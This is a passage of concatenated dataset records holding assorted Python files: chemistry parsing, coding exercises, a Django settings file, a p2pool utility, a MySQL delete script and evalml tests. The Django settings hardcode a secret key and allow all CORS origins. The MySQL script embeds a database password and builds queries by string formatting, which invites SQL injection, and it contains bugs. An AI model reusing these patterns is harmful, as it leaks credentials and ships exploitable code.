started\r\n\t\t\t\telif name[a].isupper() and a > 0:\r\n\t\t\t\t\t#If a repeated element within this molecule\r\n\t\t\t\t\tif elhere in elements:\r\n\t\t\t\t\t\tif dighere == '':\r\n\t\t\t\t\t\t\telements[elhere] = elements[elhere] + 1\r\n\t\t\t\t\t\telif dighere != '':\r\n\t\t\t\t\t\t\telements[elhere] = elements[elhere] + int(dighere)\r\n\t\t\t\t\t\r\n\t\t\t\t\t#If first time element added for molecule\r\n\t\t\t\t\telif dighere == '':\r\n\t\t\t\t\t\telements[elhere] = 1\r\n\t\t\t\t\telif dighere != '':\r\n\t\t\t\t\t\telements[elhere] = int(dighere)\r\n\t\t\t\t\t\r\n\t\t\t\t\t#Below resets elements\r\n\t\t\t\t\telhere = name[a]\r\n\t\t\t\t\tdighere = ''\r\n\t\t\t\t\t\r\n\t\t\t#Else if number encountered\r\n\t\t\telif name[a].isdigit():\r\n\t\t\t\tdighere = dighere + name[a]\r\n\t\t\t\t\t\r\n\t\t\t#Else if error encountered\r\n\t\t\telse:\r\n\t\t\t\traise ValueError(\"Weird molecular name encountered at \" + str(a) + \"th index: \" + name)\r\n\r\n\t\t\t#Below if end of name string reached\r\n\t\t\tif (a+1) >= len(name):\r\n\t\t\t\t#Records last element\r\n\t\t\t\t#If a repeated element within this molecule\r\n\t\t\t\tif elhere in elements:\r\n\t\t\t\t\tif dighere == '':\r\n\t\t\t\t\t\telements[elhere] = elements[elhere] + 1\r\n\t\t\t\t\telif dighere != '':\r\n\t\t\t\t\t\telements[elhere] = elements[elhere] + int(dighere)\r\n\t\t\t\t\r\n\t\t\t\t#If first time element added for molecule\r\n\t\t\t\telif dighere == '':\r\n\t\t\t\t\telements[elhere] = 1\r\n\t\t\t\telif dighere != '':\r\n\t\t\t\t\telements[elhere] = int(dighere)\r\n\t\t\t\r\n\t\t#Below attributes the recorded elements\r\n\t\treturn elements\r\n\r\n\r\n#FUNCTION: __str__\r\n#PURPOSE: This function is meant to specify what occurs when attempting to print an object Mol.\r\n\tdef __str__(self):\r\n\t\t#Below generates strings of information to print\r\n\t\tstrname = 'Molecule: ' + self.name + '\\n'\r\n\t\tstrels = 'Elements: ' + str(self.elements) + '\\n'\r\n\t\tstrmass = 'Mass (kg): {:.2e} \\n'.format(self.mass)\r\n\t\tstrenergy = 'Energy (K): {:.2f} \\n'.format(self.energy)\r\n\t\tstrxtot = 'Molecular Fraction of Total nH: {:.2e} \\n'.format(self.xtot)\r\n\t\t\r\n\t\t#Below puts together string of information\r\n\t\tdone = (strname + strels + strmass + strenergy + strxtot)\r\n\t\t\t\t\r\n\t\t#Below returns string to print\r\n\t\treturn done\r\n\r\n\t\t","repo_name":"apiso/Thesis","sub_path":"_Jamila/classMol.py","file_name":"classMol.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43208243959","text":"vowels_set = {'a','e','i','o','u'}\n\ndef check_vowel(str):\n set_str = set(str.lower())\n new_set = set()\n for i in set_str:\n if(i in vowels_set):\n new_set.add(i)\n if(len(new_set) == len(vowels_set)):\n return \"Accepted\"\n else:\n return \"Not accepted\" \n \ndef alternate(str):\n set_str = set(str.lower())\n intersection_set = set_str.intersection(vowels_set)\n if(len(intersection_set) == len(vowels_set)):\n return \"Accepted\"\n return \"Not accepted\"\n \n \nprint(check_vowel(\"geeksforgeeks\"))\nprint(check_vowel(\"ABeeIghiObhkUul\"))\n\nprint(alternate(\"geeksforgeeks\"))\nprint(alternate(\"ABeeIghiObhkUul\"))\n","repo_name":"dstrivedi/Python-Problems","sub_path":"Sets/strVowels.py","file_name":"strVowels.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72950036571","text":"import numpy as np\n\nT = 
int(input())\n\nfor x in range(T):\n\n    string = str(input())\n    res = \"\"\n\n    for i in range(len(string)):\n\n        # first number\n        if i == 0:\n            for j in range(int(string[i])):\n                res += \"(\"\n\n        # last number\n        if i == len(string)-1:\n            res += string[i]\n            for j in range(int(string[i])):\n                res += \")\"\n        \n        # any other number\n        if i != len(string)-1:\n            current = int(string[i])\n            next = int(string[i+1])\n\n            res += string[i]\n\n            if current > next:\n                n = current-next\n                for j in range(n):\n                    res += \")\"\n\n            if next > current:\n                n = next-current\n                for j in range(n):\n                    res += \"(\"\n    \n    \n    print(\"Case #\"+ str(x+1) +\":\", res)\n\n\n\n","repo_name":"lucaspec/CodeJam","sub_path":"Training1/nestingdepth.py","file_name":"nestingdepth.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27394277435","text":"\nfrom pathlib import Path\nfrom datetime import timedelta\nimport os\n\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'django-insecure-cy^ces4t@3b=@nz7097c-b*d9av^(lwgf-t6o6%3l)zm$1-skw'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = [\n    \n    'django.contrib.admin',\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.messages',\n    'django.contrib.staticfiles',\n    #'django.contrib.postgres',\n\n    # third party\n    'rest_framework',\n    'rest_framework_simplejwt.token_blacklist',\n    'django_seed',\n    'corsheaders',\n    \n    # our apps\n\n    \n    'users', \n    'store',\n\n\n]\n\nAUTH_USER_MODEL = 'users.NewUser'\n\nMIDDLEWARE = [\n    'corsheaders.middleware.CorsMiddleware', \n    'django.middleware.security.SecurityMiddleware',\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.middleware.common.CommonMiddleware',\n    'django.middleware.csrf.CsrfViewMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n    #'debug_toolbar.middleware.DebugToolbarMiddleware',\n    'django.contrib.messages.middleware.MessageMiddleware',\n    'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\nif DEBUG:\n    MIDDLEWARE += [\n        'debug_toolbar.middleware.DebugToolbarMiddleware',\n    ]\n    INSTALLED_APPS += [\n        'debug_toolbar',\n    ]\n    INTERNAL_IPS = ['127.0.0.1', ]\n\nimport mimetypes\nmimetypes.add_type(\"application/javascript\", \".js\", True)\n\nDEBUG_TOOLBAR_CONFIG = {\n    'INTERCEPT_REDIRECTS': False,\n}\n\nROOT_URLCONF = 'salon.urls'\n\nTEMPLATES = [\n    {\n        'BACKEND': 'django.template.backends.django.DjangoTemplates',\n        'DIRS': [BASE_DIR / 'templates'],\n        'APP_DIRS': True,\n        'OPTIONS': {\n            'context_processors': [\n                'django.template.context_processors.debug',\n                'django.template.context_processors.request',\n                'django.contrib.auth.context_processors.auth',\n                'django.contrib.messages.context_processors.messages',\n            ],\n        },\n    },\n]\n\nWSGI_APPLICATION = 'salon.wsgi.application'\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.sqlite3',\n        'NAME': BASE_DIR / 'db.sqlite3',\n    }\n}\n\n\n# DATABASES = {\n#     'default': {\n#         'ENGINE': 'django.db.backends.postgresql_psycopg2',\n#         'NAME': 'salon_db',\n#         'USER': 'postgres',\n#         'PASSWORD': 
os.environ.get('POSTGRES_PASSWORD'),\n# 'HOST': '127.0.0.1',\n# 'PORT': '5432',\n# }\n# }\n\n# Password validation\n# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.2/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.2/howto/static-files/\n\n\n# Default primary key field type\n# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field\n\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\nSTATIC_URL = '/static/'\nMEDIA_URL = '/images/'\n\nSTATICFILES_DIRS = [\n BASE_DIR / 'static',\n BASE_DIR / 'frontend/build/static'\n]\n\nMEDIA_ROOT = BASE_DIR / 'static/images'\nSTATIC_ROOT = BASE_DIR / 'staticfiles'\n\nREST_FRAMEWORK = {\n # project level permissions\n 'DEFAULT_PERMISSION_CLASSES': (\n # IsAuthenticatedOrReadOnly may bring problems when trying to login or register new user \n 'rest_framework.permissions.AllowAny',\n ),\n\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ),\n\n 'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.coreapi.AutoSchema'\n\n}\n\n'''\n jwt settings\n'''\n\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME': timedelta(minutes=10000),\n 'REFRESH_TOKEN_LIFETIME': timedelta(days=1),\n 'ROTATE_REFRESH_TOKENS': True,\n 'BLACKLIST_AFTER_ROTATION': True,\n 'UPDATE_LAST_LOGIN': False,\n\n 'ALGORITHM': 'HS256',\n 'SIGNING_KEY': SECRET_KEY,\n 'VERIFYING_KEY': None,\n 'AUDIENCE': None,\n 'ISSUER': None,\n\n 'AUTH_HEADER_TYPES': ('Bearer', 'JWT'),\n 'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',\n 'USER_ID_FIELD': 'id',\n 'USER_ID_CLAIM': 'user_id',\n\n 'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),\n 'TOKEN_TYPE_CLAIM': 'token_type',\n\n 'JTI_CLAIM': 'jti',\n\n 'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',\n 'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),\n 'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),\n}\n\n\nCORS_ALLOW_ALL_ORIGINS = True \n\n# CORS_ALLOW_METHODS = [\n# 'DELETE',\n# 'GET',\n# 'OPTIONS',\n# 'PATCH',\n# 'POST',\n# 'PUT',\n# ]\n\n# CORS_ALLOW_HEADERS = [\n# 'accept',\n# 'accept-encoding',\n# 'authorization',\n# 'content-type',\n# 'dnt',\n# 'origin',\n# 'user-agent',\n# 'x-csrftoken',\n# 'x-requested-with',\n# ]","repo_name":"MutwiriFrank/django_react_eccommerce","sub_path":"salon/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69986955613","text":"import collections\n\nclass StringBuffer(object):\n 'Buffer manager with great worst-case behavior'\n \n def __init__(self, data=''):\n self.buf = collections.deque([data])\n self.buf_len = len(data)\n self.pos = 0\n \n def __len__(self):\n return self.buf_len - self.pos\n \n def add(self, data):\n self.buf.append(data)\n self.buf_len += len(data)\n \n def get(self, wants):\n if self.buf_len - self.pos < wants:\n raise IndexError('not enough data')\n data = []\n 
while wants:\n            seg = self.buf[0][self.pos:self.pos+wants]\n            self.pos += len(seg)\n            while self.buf and self.pos >= len(self.buf[0]):\n                x = self.buf.popleft()\n                self.buf_len -= len(x)\n                self.pos -= len(x)\n            \n            data.append(seg)\n            wants -= len(seg)\n        return ''.join(data)\n\ndef _DataChunker(receiver):\n    wants = receiver.next()\n    buf = StringBuffer()\n    \n    while True:\n        if len(buf) >= wants:\n            wants = receiver.send(buf.get(wants))\n        else:\n            buf.add((yield))\ndef DataChunker(receiver):\n    '''\n    Produces a function that accepts data that is input into a generator\n    (receiver) in response to the receiver yielding the size of data to wait on\n    '''\n    x = _DataChunker(receiver)\n    x.next()\n    return x.send\n","repo_name":"p2pool/p2pool","sub_path":"p2pool/util/datachunker.py","file_name":"datachunker.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":1095,"dataset":"github-code","pt":"32"}
+{"seq_id":"4142458119","text":"def numcomplement(num):\n    num=format(num,\"b\")\n    print(num)\n    complement=\"\"\n    com=str(num)\n    for alpha in com:\n        if alpha==\"0\":\n            complement+=\"1\"\n        else:\n            complement+=\"0\"\n    print(complement)\n    print(int(complement,2))\n\n# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\n# class Solution:\n#     def addTwoNumbers(self, l1, l2):\n\n\ndef addnum(l1,l2):\n    print(l1)\n    add=1\n    sum1=0\n    sum2=0\n    for elem in l1:\n        sum1+=elem*add\n        add=add*10\n    add=1\n    for elem in l2:\n        sum2+=elem*add\n        add=add*10\n    print(sum1)\n    print(sum2)\n    print(sum1+sum2)\n\ndef longestpaln(word):\n    start=0\n    end=0\n    palindrome=\"\"\n    check=\"\"\n    for i in range(len(word)):\n        check+=word[i]\n        if isPalin(check):\n            if len(check)>len(palindrome):\n                palindrome=check\n    return palindrome\n\ndef isPalin(word):\n    end=-1\n    for i in range(len(word)):\n        print(word[i], word[end])\n        if i>=len(word)//2:\n            return True\n        if word[i]!=word[end]:\n            print(word[i],word[end])\n            return False\n        end -= 1\n\n\n\n\n\nif __name__ == '__main__':\n    # numcomplement(5)\n    # l1 = [2, 4, 3]\n    # l2 = [5, 6, 4]\n    # addnum(l1,l2)\n    print(longestpaln(\"babad\"))\n","repo_name":"sookmun/Advent_Of_Code_2021","sub_path":"practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"31094942708","text":"from .base import BaseCommand\n\n\nclass PercolateCommand(BaseCommand):\n    command_name = \"elasticsearch:percolate\"\n\n    def run_request(self):\n        options = dict(\n            index=self.settings.index,\n            doc_type=self.settings.doc_type,\n            body=self.get_text()\n        )\n        return self.client.percolate(**options)\n","repo_name":"KunihikoKido/sublime-elasticsearch-client","sub_path":"commands/percolate.py","file_name":"percolate.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"32"}
+{"seq_id":"12966268836","text":"import mysql.connector\n\ndef delete_from_elemental():\n    element1 = raw_input(\"Element 1 is? \")\n    element2 = raw_input(\"Element 2 is? 
\")\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_elemental_interaction = (\"DELETE FROM Elemental_Interactions \"\n \"WHERE (element1 = %s AND element2 = %s)\")\n data_elemental = (element1, element2)\n cursor.execute(delete_elemental_interaction, data_elemental)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_enemy():\n name = raw_input(\"Name is? \")\n delete_from_intermediary(\"Enemy_Rewards\", \"Enemys\", name)\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_enemy = (\"DELETE FROM Enemies \"\n \"WHERE name = %s\")\n data_enemy = (name)\n cursor.execute(delete_enemy, data_enemy)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_elite():\n name = raw_input(\"Name is? \")\n delete_from_intermediary(\"Elite_Rewards\", \"Elites\", name)\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_elite = (\"DELETE FROM Elites \"\n \"WHERE name = %s\")\n data_elite = (name)\n cursor.execute(delete_elite, data_elite)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_characters():\n name = raw_input(\"Name is? \")\n delete_from_intermediary(\"Character_Rewards\", \"Characters\", name)\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_character = (\"DELETE FROM Characters \"\n \"WHERE name = %s\")\n data_character = (name)\n cursor.execute(delete_charater, data_character)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_domain():\n name = raw_input(\"Name is? \")\n delete_from_intermediary(\"Domain_Rewards\", \"Domains\", name)\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_domain = (\"DELETE FROM Domains \"\n \"WHERE name = %s\")\n data_domain = (name)\n cursor.execute(delete_domain, data_domain)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_rewards():\n name = raw_input(\"Name is? 
\")\n delete_from_intermediary(\"Character_Rewards\", \"Rewards\", name)\n delete_from_intermediary(\"Elite_Rewards\", \"Rewards\", name)\n delete_from_intermediary(\"Domain_Rewards\", \"Rewards\", name)\n delete_from_intermediary(\"Enemy_Rewards\", \"Rewards\", name)\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_reward = (\"DELETE FROM Rewards \"\n \"WHERE name = %s\")\n data_reward = (name,)\n cursor.execute(delete_reward, data_reward)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_intermediary(targetTableName, sourceTableName, itemName):\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n if sourceTableName == \"Rewards\":\n cursor.execute(\"\"\"DELETE FROM {} WHERE reward_id = \n (SELECT reward_id FROM Rewards\n WHERE name = \"{}\");\"\"\".format(targetTableName, itemName))\n else:\n cursor.execute(\"\"\"DELETE FROM {} WHERE {}_id = \n (SELECT {}_id FROM {}\n WHERE name = \"{}\");\"\"\".format(targetTableName, (sourceTableName.lower())[:-1], (sourceTableName.lower())[:-1], sourceTableName, itemName))\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()","repo_name":"lordn54/Genshin-Impact-DB","sub_path":"deleteFromDatabase.py","file_name":"deleteFromDatabase.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11522066839","text":"from unittest.mock import patch\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nimport woodwork as ww\nfrom pandas.testing import assert_frame_equal\nfrom woodwork.logical_types import (\n Boolean,\n Categorical,\n Datetime,\n Double,\n Integer,\n NaturalLanguage,\n)\n\nfrom evalml.exceptions import ComponentNotYetFittedError\nfrom evalml.pipelines.components import TargetEncoder\n\n\ndef test_init():\n parameters = {\n \"cols\": None,\n \"smoothing\": 1.0,\n \"handle_unknown\": \"value\",\n \"handle_missing\": \"value\",\n }\n encoder = TargetEncoder()\n assert encoder.parameters == parameters\n\n\ndef test_parameters():\n encoder = TargetEncoder(cols=[\"a\"])\n expected_parameters = {\n \"cols\": [\"a\"],\n \"smoothing\": 1.0,\n \"handle_unknown\": \"value\",\n \"handle_missing\": \"value\",\n }\n assert encoder.parameters == expected_parameters\n\n\ndef test_categories():\n encoder = TargetEncoder()\n with pytest.raises(AttributeError, match=\"'TargetEncoder' object has no attribute\"):\n encoder.categories\n\n\ndef test_invalid_inputs():\n with pytest.raises(ValueError, match=\"Invalid input 'test' for handle_unknown\"):\n TargetEncoder(handle_unknown=\"test\")\n with pytest.raises(ValueError, match=\"Invalid input 'test2' for handle_missing\"):\n TargetEncoder(handle_missing=\"test2\")\n with pytest.raises(\n ValueError,\n match=\"Smoothing value needs to be strictly larger than 0\",\n ):\n TargetEncoder(smoothing=0)\n\n\ndef test_null_values_in_dataframe():\n X = pd.DataFrame(\n {\n \"col_1\": [\"a\", \"b\", \"c\", \"d\", np.nan],\n \"col_2\": [\"a\", \"b\", \"a\", \"c\", \"b\"],\n \"col_3\": [\"a\", \"a\", \"a\", \"a\", \"a\"],\n },\n 
)\n X.ww.init(\n logical_types={\n \"col_1\": \"categorical\",\n \"col_2\": \"categorical\",\n \"col_3\": \"categorical\",\n },\n )\n y = pd.Series([0, 1, 1, 1, 0])\n encoder = TargetEncoder(handle_missing=\"value\")\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": [0.6, 0.6, 0.6, 0.6, 0.6],\n \"col_2\": [0.526894, 0.526894, 0.526894, 0.6, 0.526894],\n \"col_3\": [\n 0.6,\n 0.6,\n 0.6,\n 0.6,\n 0.6,\n ],\n },\n )\n\n assert_frame_equal(X_expected, X_t)\n\n encoder = TargetEncoder(handle_missing=\"return_nan\")\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": [0.6, 0.6, 0.6, 0.6, np.nan],\n \"col_2\": [0.526894, 0.526894, 0.526894, 0.6, 0.526894],\n \"col_3\": [\n 0.6,\n 0.6,\n 0.6,\n 0.6,\n 0.6,\n ],\n },\n )\n assert_frame_equal(X_expected, X_t)\n\n encoder = TargetEncoder(handle_missing=\"error\")\n with pytest.raises(ValueError, match=\"Columns to be encoded can not contain null\"):\n encoder.fit(X, y)\n\n\ndef test_cols():\n X = pd.DataFrame(\n {\n \"col_1\": [1, 2, 1, 1, 2] * 2,\n \"col_2\": [\"2\", \"1\", \"1\", \"1\", \"1\"] * 2,\n \"col_3\": [\"a\", \"a\", \"a\", \"a\", \"b\"] * 2,\n },\n )\n X_expected = X.astype({\"col_1\": \"int64\", \"col_2\": \"int64\", \"col_3\": \"category\"})\n y = pd.Series([0, 1, 1, 1, 0] * 2)\n encoder = TargetEncoder(cols=[])\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n assert_frame_equal(X_expected, X_t)\n\n encoder = TargetEncoder(cols=[\"col_3\"])\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": pd.Series([1, 2, 1, 1, 2] * 2, dtype=\"int64\"),\n \"col_2\": [2, 1, 1, 1, 1] * 2,\n \"col_3\": pd.Series(\n [0.749863, 0.749863, 0.749863, 0.749863, 0.161365] * 2,\n dtype=\"float64\",\n ),\n },\n )\n assert_frame_equal(X_expected, X_t, rtol=1e-3)\n\n encoder = TargetEncoder(cols=[\"col_3\"])\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n encoder2 = TargetEncoder()\n encoder2.fit(X, y)\n X_t2 = encoder2.transform(X)\n assert_frame_equal(X_t, X_t2)\n\n\ndef test_transform():\n X = pd.DataFrame(\n {\n \"col_1\": [1, 2, 1, 1, 2],\n \"col_2\": [\"r\", \"t\", \"s\", \"t\", \"t\"],\n \"col_3\": [\"a\", \"a\", \"a\", \"b\", \"a\"],\n },\n )\n X.ww.init(logical_types={\"col_2\": \"categorical\", \"col_3\": \"categorical\"})\n y = pd.Series([0, 1, 1, 1, 0])\n encoder = TargetEncoder()\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": pd.Series([1, 2, 1, 1, 2], dtype=\"int64\"),\n \"col_2\": [0.6, 0.65872, 0.6, 0.65872, 0.65872],\n \"col_3\": [0.504743, 0.504743, 0.504743, 0.6, 0.504743],\n },\n )\n assert_frame_equal(X_expected, X_t)\n\n\ndef test_smoothing():\n # larger smoothing values should bring the values closer to the global mean\n X = pd.DataFrame(\n {\n \"col_1\": [1, 2, 1, 1, 2],\n \"col_2\": [2, 1, 1, 1, 1],\n \"col_3\": [\"a\", \"a\", \"a\", \"a\", \"b\"],\n },\n )\n X.ww.init(logical_types={\"col_3\": \"categorical\"})\n y = pd.Series([0, 1, 1, 1, 0])\n encoder = TargetEncoder(smoothing=1)\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": pd.Series([1, 2, 1, 1, 2], dtype=\"int64\"),\n \"col_2\": pd.Series([2, 1, 1, 1, 1], dtype=\"int64\"),\n \"col_3\": [0.742886, 0.742886, 0.742886, 0.742886, 0.6],\n },\n )\n assert_frame_equal(X_expected, X_t)\n\n encoder = TargetEncoder(smoothing=10)\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": pd.Series([1, 2, 1, 1, 2], 
dtype=\"int64\"),\n \"col_2\": pd.Series([2, 1, 1, 1, 1], dtype=\"int64\"),\n \"col_3\": [0.686166, 0.686166, 0.686166, 0.686166, 0.6],\n },\n )\n assert_frame_equal(X_expected, X_t)\n\n encoder = TargetEncoder(smoothing=100)\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": pd.Series([1, 2, 1, 1, 2], dtype=\"int64\"),\n \"col_2\": pd.Series([2, 1, 1, 1, 1], dtype=\"int64\"),\n \"col_3\": [0.676125, 0.676125, 0.676125, 0.676125, 0.6],\n },\n )\n assert_frame_equal(X_expected, X_t)\n\n\ndef test_get_feature_names():\n X = pd.DataFrame(\n {\n \"col_1\": [1, 2, 1, 1, 2],\n \"col_2\": [\"r\", \"t\", \"s\", \"t\", \"t\"],\n \"col_3\": [\"a\", \"a\", \"a\", \"b\", \"a\"],\n },\n )\n y = pd.Series([0, 1, 1, 1, 0])\n encoder = TargetEncoder()\n with pytest.raises(\n ComponentNotYetFittedError,\n match=\"This TargetEncoder is not fitted yet. You must fit\",\n ):\n encoder.get_feature_names()\n encoder.fit(X, y)\n np.testing.assert_array_equal(\n encoder.get_feature_names(),\n np.array([\"col_1\", \"col_2\", \"col_3\"]),\n )\n\n\n@patch(\"evalml.pipelines.components.transformers.transformer.Transformer.fit\")\ndef test_pandas_numpy(mock_fit, X_y_binary):\n X, y = X_y_binary\n X = pd.DataFrame(X).sample(frac=1)\n\n encoder = TargetEncoder()\n\n encoder.fit(X, y)\n assert_frame_equal(mock_fit.call_args[0][0], X)\n\n X_numpy = X.to_numpy()\n encoder.fit(X_numpy, y)\n\n\n@pytest.mark.parametrize(\n \"X_df\",\n [\n pd.DataFrame(\n pd.to_datetime([\"20190902\", \"20200519\", \"20190607\"], format=\"%Y%m%d\"),\n ),\n pd.DataFrame(pd.Series([1, 2, 3], dtype=\"Int64\")),\n pd.DataFrame(pd.Series([1.0, 2.0, 3.0], dtype=\"float\")),\n pd.DataFrame(pd.Series([\"a\", \"b\", \"a\"], dtype=\"category\")),\n pd.DataFrame(pd.Series([True, False, True], dtype=\"boolean\")),\n pd.DataFrame(\n pd.Series(\n [\"this will be a natural language column because length\", \"yay\", \"hay\"],\n dtype=\"string\",\n ),\n ),\n ],\n)\ndef test_target_encoder_woodwork_custom_overrides_returned_by_components(X_df):\n y = pd.Series([1, 2, 1])\n override_types = [Integer, Double, Categorical, NaturalLanguage, Boolean, Datetime]\n for logical_type in override_types:\n try:\n X = X_df.copy()\n X.ww.init(logical_types={0: logical_type})\n except (ww.exceptions.TypeConversionError, ValueError, TypeError):\n continue\n\n encoder = TargetEncoder()\n encoder.fit(X, y)\n transformed = encoder.transform(X, y)\n assert isinstance(transformed, pd.DataFrame)\n\n if logical_type == Categorical:\n assert {k: type(v) for k, v in transformed.ww.logical_types.items()} == {\n 0: Double,\n }\n else:\n assert {k: type(v) for k, v in transformed.ww.logical_types.items()} == {\n 0: logical_type,\n }\n","repo_name":"alteryx/evalml","sub_path":"evalml/tests/component_tests/test_target_encoder.py","file_name":"test_target_encoder.py","file_ext":"py","file_size_in_byte":8914,"program_lang":"python","lang":"en","doc_type":"code","stars":664,"dataset":"github-code","pt":"32"} +{"seq_id":"9942038940","text":"class Solution:\n def findDiagonalOrder(self, mat: List[List[int]]) -> List[int]:\n iteration = 0\n i, j = 0, 1\n res = []\n while i', methods=['GET'])\ndef get_offre(id):\n # Par defaut si l id n est pas trouve, on renvoi 404. 
